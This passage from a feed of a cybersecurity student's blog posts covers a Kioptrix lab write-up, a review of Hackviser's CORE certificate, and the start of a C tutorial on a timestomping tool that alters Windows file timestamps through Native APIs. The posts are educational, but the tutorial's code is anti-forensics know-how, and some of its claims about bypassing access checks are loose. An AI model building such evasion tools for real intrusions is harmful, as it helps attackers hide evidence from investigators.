│  (Attacker) │  LAN     │   (Target VM)     │&lt;br&gt;
└─────────────┘         └──────────────────┘&lt;br&gt;
        Isolated network — VMware Workstation&lt;br&gt;
Attacker: Kali Linux&lt;br&gt;
Target: Kioptrix Level 1&lt;br&gt;
Hypervisor: VMware Workstation&lt;br&gt;
Network: Isolated lab segment&lt;/p&gt;

&lt;p&gt;Running this in isolation matters — these services have real, documented, unpatched vulnerabilities. Safe to break here, never safe on a live network.&lt;/p&gt;

&lt;p&gt;🔍 Reconnaissance&lt;/p&gt;

&lt;p&gt;Every assessment starts with figuring out what's actually there.&lt;/p&gt;

&lt;p&gt;First step: confirm the target is alive on the network. Second: full port scan to map the attack surface.&lt;/p&gt;

&lt;p&gt;(Insert Nmap screenshot here)&lt;/p&gt;

&lt;p&gt;The scan surfaced several services worth digging into:&lt;/p&gt;

&lt;p&gt;SSH&lt;br&gt;
HTTP&lt;br&gt;
HTTPS&lt;br&gt;
RPC&lt;br&gt;
Samba&lt;/p&gt;

&lt;p&gt;The standout finding was version detection flagging a very old Apache build paired with an outdated OpenSSL install. Legacy software like this tends to have well-documented public exploits, so this immediately became priority #1.&lt;/p&gt;

&lt;p&gt;🧩 Enumeration&lt;/p&gt;

&lt;p&gt;Open ports are just the entry point — the real work is understanding what each service actually exposes.&lt;/p&gt;

&lt;p&gt;SMB enumeration revealed the workgroup configuration and available shares.&lt;br&gt;
Directory enumeration on the web server surfaced additional paths that hinted at server configuration details.&lt;/p&gt;

&lt;p&gt;(Insert enumeration screenshot here)&lt;/p&gt;

&lt;p&gt;Takeaway: Enumeration is the phase that decides everything downstream. Skipping depth here means missing attack paths later — no exploit compensates for weak recon.&lt;/p&gt;

&lt;p&gt;🛠️ Vulnerability Assessment&lt;/p&gt;

&lt;p&gt;With accurate service versions in hand, I moved to matching them against known CVEs.&lt;/p&gt;

&lt;p&gt;Both the Apache and OpenSSL versions lined up with documented, publicly known vulnerabilities — strong candidates for exploitation in this lab context.&lt;/p&gt;

&lt;p&gt;The approach here mattered more than the outcome: match the exploit to the confirmed version, don't spray-and-pray. Accurate fingerprinting up front saves a lot of wasted effort later.&lt;/p&gt;

&lt;p&gt;⚠️ Unexpected Challenges&lt;/p&gt;

&lt;p&gt;Honestly, the most educational part of this lab wasn't the initial exploit — it was everything that broke after getting a foothold.&lt;/p&gt;

&lt;p&gt;An exploit dependency referenced online no longer existed.&lt;br&gt;
The target was missing tooling that modern systems take for granted.&lt;br&gt;
File transfer to the target needed a workaround given the environment's limitations.&lt;br&gt;
Some public exploit source had formatting issues that broke compilation on first try.&lt;/p&gt;

&lt;p&gt;None of these were individually hard, but stacked together they taught a bigger lesson:&lt;/p&gt;

&lt;p&gt;Real engagements never go exactly like the writeup. Knowing how to debug a broken exploit chain is as valuable as knowing the exploit itself.&lt;/p&gt;

&lt;p&gt;🔑 Privilege Escalation&lt;/p&gt;

&lt;p&gt;With limited access secured, the next question was: can this go further?&lt;/p&gt;

&lt;p&gt;Digging into the OS and kernel details turned up a well-known local privilege escalation vulnerability affecting this legacy environment. Successfully leveraging it confirmed full compromise.&lt;/p&gt;

&lt;p&gt;This is the part that really drives the lesson home: one exposed network service plus one unpatched OS equals total system compromise. Patch management isn't optional at any layer.&lt;/p&gt;

&lt;p&gt;📚 Lessons Learned&lt;/p&gt;

&lt;p&gt;Enumeration drives everything. Every later decision traces back to how well you understood the target up front.&lt;/p&gt;

&lt;p&gt;Know before you act. Confirmed versions beat guesswork every time.&lt;/p&gt;

&lt;p&gt;Troubleshooting is a core skill, not a side skill. Broken links, missing deps, outdated tooling — legacy boxes force you to actually debug, not just follow a script.&lt;/p&gt;

&lt;p&gt;Defense matters as much as offense. Seeing how small outdated components chain into full compromise makes the case for patching and reducing exposed surface area better than any slide deck.&lt;/p&gt;

&lt;p&gt;💭 Final Thoughts&lt;/p&gt;

&lt;p&gt;Kioptrix Level 1 is still one of the best entry points into the penetration testing lifecycle — not because it's technically hard, but because it forces discipline: observe carefully, work methodically, don't skip steps.&lt;/p&gt;

&lt;p&gt;For anyone starting out, this box is a genuinely good place to build the habits that carry into everything harder down the line.&lt;/p&gt;

&lt;p&gt;Name: Zain Sial Title: Cybersecurity Student GitHub: github.com/zainsial866 &lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>webtesting</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>🔐 From Zero to CORE: My 3-Day Deep Dive Into Hackviser's Certified Cybersecurity Foundations</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Fri, 24 Jul 2026 09:39:07 +0000</pubDate>
      <link>https://dev.to/iamzsial/from-zero-to-core-my-3-day-deep-dive-into-hackvisers-certified-cybersecurity-foundations-23gn</link>
      <guid>https://dev.to/iamzsial/from-zero-to-core-my-3-day-deep-dive-into-hackvisers-certified-cybersecurity-foundations-23gn</guid>
      <description>&lt;p&gt;🔐 From Zero to CORE: My 3-Day Deep Dive Into Hackviser's Certified Cybersecurity Foundations&lt;/p&gt;

&lt;p&gt;"Every cybersecurity professional starts somewhere. This is where I started — and honestly? It didn't feel basic at all."&lt;/p&gt;

&lt;p&gt;If you've ever felt the gap between "I finished a cybersecurity lecture" and "I actually know what I'm doing," this post is for you. I just wrapped up Hackviser's Certified Cybersecurity Foundations (CORE) certification — 19 modules, 7 domains, 3 days, zero paywalls — and I walked away with way more than a PDF certificate. I want to break down exactly what's inside CORE, why it's structured the way it is, and why I think every cybersecurity student and career-switcher should run through it before touching anything more advanced. 🚀&lt;/p&gt;

&lt;p&gt;🧭 What Even Is CORE?&lt;/p&gt;

&lt;p&gt;A little research before I dove in: CORE is Hackviser's free foundations certificate built specifically for cybersecurity beginners — students, career switchers, and anyone curious enough to want a structured on-ramp instead of a scattered pile of YouTube tutorials. A few things stood out to me about how it's positioned:&lt;/p&gt;

&lt;p&gt;✅ 100% free — no VIP membership, no paywall, no "unlock the good parts for $89" trick&lt;br&gt;
✅ Certificate valid forever — it's not a subscription badge that expires&lt;br&gt;
✅ Zero prior experience required — genuinely built for people starting from scratch&lt;br&gt;
✅ Officially recommended as the first step before CAPT (Hackviser's Certified Associate Penetration Tester cert), so it's explicitly a stepping stone, not a dead end&lt;/p&gt;

&lt;p&gt;Within its first day of launch, Hackviser reported thousands of learners had already earned the cert — which tells you there's real demand for a foundations-level program that doesn't gatekeep behind a price tag. 💯&lt;/p&gt;

&lt;p&gt;So here's my full module-by-module breakdown — the good, the surprising, and the genuinely fun parts. 👇&lt;/p&gt;

&lt;p&gt;1️⃣ Introduction to Cybersecurity&lt;/p&gt;

&lt;p&gt;Short, but it sets the tone immediately: cybersecurity isn't one skill, it's an umbrella — network defense, app security, incident response, social engineering awareness, and (increasingly) AI security, all under one roof. No fluff, straight into orientation.&lt;/p&gt;

&lt;p&gt;2️⃣ Threat and Incident Management ⚔️&lt;/p&gt;

&lt;p&gt;This is where the frameworks started clicking:&lt;/p&gt;

&lt;p&gt;🔗 The Cyber Kill Chain — the seven stages an attacker walks through, from reconnaissance to actions on objectives. Once this clicks, you can't read a breach headline anymore without mentally mapping which link in the chain got exploited.&lt;br&gt;
🚨 The Incident Response Lifecycle — preparation → detection → containment → eradication → recovery → lessons learned. This is the calm, repeatable process that replaces panic when something actually goes wrong.&lt;/p&gt;

&lt;p&gt;The lightbulb moment: the kill chain tells you what the attacker is doing at each stage, and the IR lifecycle tells you exactly how to respond at that same stage. They're two sides of the same coin.&lt;/p&gt;

&lt;p&gt;3️⃣ Network and Web Fundamentals 🌐&lt;/p&gt;

&lt;p&gt;Easily the densest — and most immediately useful — section:&lt;/p&gt;

&lt;p&gt;Network Fundamentals — OSI model, TCP/UDP behavior, ports and services. This paid off immediately in the practical labs, where I had to run nmap scans and actually interpret what open ports like SSH, DNS, RPC, and VNC meant about a target machine.&lt;br&gt;
Web Fundamentals — HTTP request/response cycles, headers, cookies, sessions. The invisible plumbing behind literally every website you've ever used.&lt;br&gt;
OWASP Top 10 (2025) — the current, just-updated list of the most critical web application security risks. This one deserves its own dedicated deep-dive post soon — the 2025 revision reflects how much attack surface has shifted with modern API-first, JS-heavy architectures.&lt;br&gt;
4️⃣ Generative AI Security 🤖&lt;/p&gt;

&lt;p&gt;Did not expect this in a foundations-level cert, and it might be my favorite surprise of the whole program. LLM Security Fundamentals covers the genuinely new attack surface emerging around large language models: prompt injection, data leakage, model manipulation. With AI getting bolted onto every product on Earth right now, this isn't a "bonus module" — it's a preview of where a massive chunk of future security work is heading. Hackviser clearly built this to be current, not textbook-stale.&lt;/p&gt;

&lt;p&gt;5️⃣ Reconnaissance and Social Engineering 🕵️&lt;/p&gt;

&lt;p&gt;This is where things got genuinely fun:&lt;/p&gt;

&lt;p&gt;Information Gathering with OSINT — using publicly available information to build a target profile before ever touching a system. Deceptively simple-sounding, endlessly deep once you start pulling threads.&lt;br&gt;
Social Engineering with Phishing — full anatomy of phishing attacks: fake emails, cloned websites, malware delivery — and the detection side: reading email headers, verifying SPF/DKIM/DMARC records, spotting domain-spoofing tricks (looking at you, rn disguised as m). The human layer is still the weakest link in almost every real-world breach, and this module made that uncomfortably concrete. 😬&lt;br&gt;
6️⃣ Cryptology Fundamentals 🔓&lt;/p&gt;

&lt;p&gt;Six sub-modules, and this is where the cert turned into an actual puzzle box:&lt;/p&gt;

&lt;p&gt;Binary, Hex Encoding, Base64 — encoding schemes that show up everywhere once you learn to spot them. Half of "advanced-looking" gibberish online is just plaintext wearing a costume.&lt;br&gt;
SHA1 and MD5 — cryptographic hashing, and crucially, why MD5's known collision vulnerabilities mean it should never be trusted for anything security-sensitive today — even though it's still everywhere in the wild.&lt;/p&gt;

&lt;p&gt;Nothing teaches you the danger of an unsalted, weak hash faster than looking one up in a rainbow table and getting the plaintext back in under a second. ⚡&lt;/p&gt;

&lt;p&gt;7️⃣ Practical Exercises 🛠️&lt;/p&gt;

&lt;p&gt;This is where every prior domain got stress-tested against real, live machines via Hackviser's browser-based Hackerbox:&lt;/p&gt;

&lt;p&gt;Arrow — built around Telnet, a legacy remote-access protocol with zero encryption. Scanning it, connecting to it, and understanding exactly why it's considered insecure by modern standards was a great gut-check.&lt;br&gt;
File Hunter — locating hidden/sensitive files on a target system.&lt;br&gt;
Secure Command — command-line security fundamentals.&lt;br&gt;
Query Gate — reasoning through query-based access and filtering logic.&lt;/p&gt;

&lt;p&gt;Running actual nmap scans and interpreting the output against machines I could see running live turned every earlier "theory" module into muscle memory. 💪&lt;/p&gt;

&lt;p&gt;🎯 Why This Actually Matters (Beyond the Badge)&lt;/p&gt;

&lt;p&gt;Here's the thing about CORE that I didn't fully appreciate until I finished it: it's not trying to make you an expert in three days. It's stitching together the vocabulary, the frameworks, and the hands-on reps you need so that more advanced material (CAPT, and beyond) doesn't feel like being thrown in the deep end.&lt;/p&gt;

&lt;p&gt;The structural trick that makes it work: you're not just reading about the Cyber Kill Chain — in the same week, you're doing reconnaissance, cracking encodings, and scanning live boxes. That "learn → immediately apply" loop is exactly what a lot of traditional university coursework misses, and it's the single biggest reason I'd recommend this path to any beginner. 🔥&lt;/p&gt;

&lt;p&gt;📌 Quick Reference: The 7 Domains&lt;/p&gt;

&lt;h1&gt;
  
  
  Domain  Key Skills
&lt;/h1&gt;

&lt;p&gt;1   Introduction to Cybersecurity   Orientation &amp;amp; terminology&lt;br&gt;
2   Threat &amp;amp; Incident Management    Cyber Kill Chain, IR Lifecycle&lt;br&gt;
3   Network &amp;amp; Web Fundamentals  OSI/TCP-IP, HTTP, OWASP Top 10 (2025)&lt;br&gt;
4   Generative AI Security  LLM attack surfaces&lt;br&gt;
5   Recon &amp;amp; Social Engineering  OSINT, phishing detection&lt;br&gt;
6   Cryptology Fundamentals Binary/Hex/Base64, SHA1, MD5&lt;br&gt;
7   Practical Exercises nmap, Telnet, file/command/query labs&lt;br&gt;
🚀 What's Next For Me&lt;/p&gt;

&lt;p&gt;With CORE in the bag, I'm heading deeper into the OWASP Top 10 (2025) and continuing my Windows internals work in C — timestomping, Alternate Data Streams, and Win32 API offensive-security tooling. If you've been following my build logs and CTF write-ups, more is coming soon. 🧵&lt;/p&gt;

&lt;p&gt;If you're a fellow cybersecurity student, IT major, or career-switcher wondering where to start — genuinely, go try Hackviser's free CORE content. It respects your time and your curiosity in equal measure, and that combination is rarer than it should be. ✨&lt;/p&gt;

&lt;p&gt;Tags: #cybersecurity #infosec #beginners #ctf #appsec #networking #cryptography #osint #owasp&lt;/p&gt;

&lt;p&gt;Muhammad Zain Ul Abdin is a cybersecurity student focused on Windows internals, offensive security, and tool development. Follow the journey on GitHub.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>beginners</category>
      <category>infosec</category>
      <category>ai</category>
    </item>
    <item>
      <title>How to Build a Timestomping Utility: Windows Native APIs &amp; Forensic Evasion</title>
      <dc:creator>Muhammad Zain-Ul-Abdin</dc:creator>
      <pubDate>Tue, 14 Jul 2026 09:35:07 +0000</pubDate>
      <link>https://dev.to/iamzsial/how-to-build-a-timestomping-utility-windows-native-apis-forensic-evasion-33b4</link>
      <guid>https://dev.to/iamzsial/how-to-build-a-timestomping-utility-windows-native-apis-forensic-evasion-33b4</guid>
      <description>&lt;h1&gt;
  
  
  How to Build a Timestomping Utility: Windows Native APIs, NTFS Metadata &amp;amp; Forensic Evasion
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Title:&lt;/strong&gt; How to Build a Timestomping Utility: Windows Native APIs, NTFS Metadata &amp;amp; Forensic Evasion&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Learn how file timestamps work in Windows, how they can be modified using Native APIs, and why forensic examiners need multiple data sources to catch manipulation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tags:&lt;/strong&gt; &lt;code&gt;#windows&lt;/code&gt; &lt;code&gt;#cybersecurity&lt;/code&gt; &lt;code&gt;#ntfs&lt;/code&gt; &lt;code&gt;#native-api&lt;/code&gt; &lt;code&gt;#forensics&lt;/code&gt; &lt;code&gt;#c&lt;/code&gt; &lt;code&gt;#malware-analysis&lt;/code&gt; &lt;code&gt;#windows-internals&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reading Time:&lt;/strong&gt; 8 min&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Difficulty:&lt;/strong&gt; Intermediate&lt;/p&gt;


&lt;h2&gt;
  
  
  🎯 Introduction
&lt;/h2&gt;

&lt;p&gt;Ever wondered how malware hides its tracks on Windows systems? One of the most overlooked—yet powerful—techniques is &lt;strong&gt;timestomping&lt;/strong&gt;: modifying file creation, modification, and access timestamps to appear innocuous.&lt;/p&gt;

&lt;p&gt;In this post, I'll walk you through:&lt;/p&gt;

&lt;p&gt;✅ How Windows stores file timestamps&lt;br&gt;&lt;br&gt;
✅ Why investigators rely on them&lt;br&gt;&lt;br&gt;
✅ How to build a timestomping utility from scratch&lt;br&gt;&lt;br&gt;
✅ Why timestomping alone is insufficient for evasion&lt;br&gt;&lt;br&gt;
✅ How forensic examiners can detect manipulation  &lt;/p&gt;

&lt;p&gt;I've built a working timestomper in C using Windows Native APIs—let's dissect it.&lt;/p&gt;


&lt;h2&gt;
  
  
  📋 The Problem: File Timestamps in Forensics
&lt;/h2&gt;

&lt;p&gt;When an investigator reconstructs a timeline of events on a compromised system, they often start with &lt;strong&gt;file metadata&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Standard questions during incident response:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When was this executable created?&lt;/li&gt;
&lt;li&gt;When was this configuration file last modified?&lt;/li&gt;
&lt;li&gt;What files were accessed around the time of the breach?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All of this relies on three critical timestamps:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Timestamp&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Creation Time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;When the file was first written to disk&lt;/td&gt;
&lt;td&gt;&lt;code&gt;2026-07-10 10:13 PM&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Last Write Time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;When the file contents changed&lt;/td&gt;
&lt;td&gt;&lt;code&gt;2026-07-10 10:15 PM&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Last Access Time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;When the file was opened&lt;/td&gt;
&lt;td&gt;&lt;code&gt;2026-07-10 3:00 PM&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If an attacker can modify these timestamps, they can:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;🕵️ Hide when malware was executed&lt;/li&gt;
&lt;li&gt;📅 Impersonate legitimate system files&lt;/li&gt;
&lt;li&gt;🔄 Obfuscate the attack timeline&lt;/li&gt;
&lt;li&gt;🚪 Evade automated detection systems&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;
  
  
  ⚙️ Understanding Windows File Timestamps
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Where Are Timestamps Stored?
&lt;/h3&gt;

&lt;p&gt;Windows stores file timestamps in the &lt;strong&gt;NTFS MFT (Master File Table)&lt;/strong&gt;. Every file has an associated entry containing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;FILE_BASIC_INFORMATION
├── CreationTime
├── LastAccessTime
├── LastWriteTime
├── ChangeTime
└── FileAttributes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  How Can We Access Them?
&lt;/h3&gt;

&lt;p&gt;There are two ways to read/modify timestamps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Win32 APIs (High-Level)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;GetFileTime&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;    &lt;span class="c1"&gt;// Read timestamps&lt;/span&gt;
&lt;span class="n"&gt;SetFileTime&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;    &lt;span class="c1"&gt;// Write timestamps (limited)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;2. Native APIs (Low-Level)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;NtQueryInformationFile&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;    &lt;span class="c1"&gt;// Query file info directly from kernel&lt;/span&gt;
&lt;span class="n"&gt;NtSetInformationFile&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;      &lt;span class="c1"&gt;// Modify file info at kernel level&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Native API approach is more powerful because:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Win32 may enforce restrictions or validation&lt;/li&gt;
&lt;li&gt;Native APIs interact directly with NTFS structures&lt;/li&gt;
&lt;li&gt;Developers can bypass certain access checks&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🔧 Building the Timestomper
&lt;/h2&gt;

&lt;p&gt;Let's break down the implementation. Full source code: &lt;a href="https://github.com/zainsial866/timestomper" rel="noopener noreferrer"&gt;github.com/zainsial866/timestomper&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Define the Structures
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;typedef&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;_FILE_BASIC_INFORMATION&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;LARGE_INTEGER&lt;/span&gt; &lt;span class="n"&gt;CreationTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LARGE_INTEGER&lt;/span&gt; &lt;span class="n"&gt;LastAccessTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LARGE_INTEGER&lt;/span&gt; &lt;span class="n"&gt;LastWriteTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;LARGE_INTEGER&lt;/span&gt; &lt;span class="n"&gt;ChangeTime&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;ULONG&lt;/span&gt;         &lt;span class="n"&gt;FileAttributes&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;LARGE_INTEGER&lt;/code&gt; format stores time as 100-nanosecond intervals since January 1, 1601 (Windows FILETIME).&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Dynamically Resolve Native APIs
&lt;/h3&gt;

&lt;p&gt;Instead of static linking, we resolve the APIs at runtime:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;NtQueryInformationFile_t&lt;/span&gt; &lt;span class="n"&gt;pNtQueryInformationFile&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; 
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NtQueryInformationFile_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;GetProcAddress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;GetModuleHandleA&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"ntdll.dll"&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; 
        &lt;span class="s"&gt;"NtQueryInformationFile"&lt;/span&gt;
    &lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pNtQueryInformationFile&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[!] Could not resolve NtQueryInformationFile&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why?&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Undocumented APIs aren't in import libraries&lt;/li&gt;
&lt;li&gt;Dynamic resolution makes the tool more portable&lt;/li&gt;
&lt;li&gt;Demonstrates runtime API patching techniques&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Step 3: Open Source &amp;amp; Destination Files
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt; &lt;span class="n"&gt;fileSrc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CreateFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;srcfile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
    &lt;span class="n"&gt;GENERIC_READ&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;// Source needs read access&lt;/span&gt;
    &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;OPEN_EXISTING&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="n"&gt;HANDLE&lt;/span&gt; &lt;span class="n"&gt;fileDst&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CreateFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;dstfile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;GENERIC_READ&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;GENERIC_WRITE&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;FILE_WRITE_ATTRIBUTES&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// Dst needs write&lt;/span&gt;
    &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;OPEN_EXISTING&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 4: Query the Source File's Timestamps
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;IO_STATUS_BLOCK&lt;/span&gt; &lt;span class="n"&gt;ioStat&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt; &lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="n"&gt;pNtQueryInformationFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;fileSrc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// File handle&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ioStat&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                          &lt;span class="c1"&gt;// Status block&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;src_fbi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;                         &lt;span class="c1"&gt;// Output buffer&lt;/span&gt;
    &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;   &lt;span class="c1"&gt;// Buffer size&lt;/span&gt;
    &lt;span class="n"&gt;FileBasicInformation&lt;/span&gt;              &lt;span class="c1"&gt;// Information class&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 5: Copy Timestamps
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;FILE_BASIC_INFORMATION&lt;/span&gt; &lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Get destination file's current metadata&lt;/span&gt;
&lt;span class="n"&gt;pNtQueryInformationFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fileDst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ioStat&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dst_fbi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
